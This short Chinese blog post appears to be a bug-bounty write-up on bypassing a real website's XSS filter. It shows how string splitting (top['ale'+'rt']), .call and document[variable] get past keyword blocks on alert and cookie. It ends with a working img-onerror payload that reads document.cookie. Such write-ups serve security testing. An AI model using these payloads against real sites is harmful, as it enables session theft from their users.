14.xss之alert绕过&cookie绕过

前言

该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。

XSS 特征

拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过

xss绕过

  1. alert用top[‘ale’+‘rt’]绕过
  2. alert()用top[‘ale’+‘rt’].call绕过
  3. cookie用document[变量]绕过

最终payload

<img src=\"x\" onerror=\"c='coo'+'kie';top['ale'+'rt'].call(null,document[c])\">

你可能感兴趣的:(SRC挖掘,xss,web安全,安全)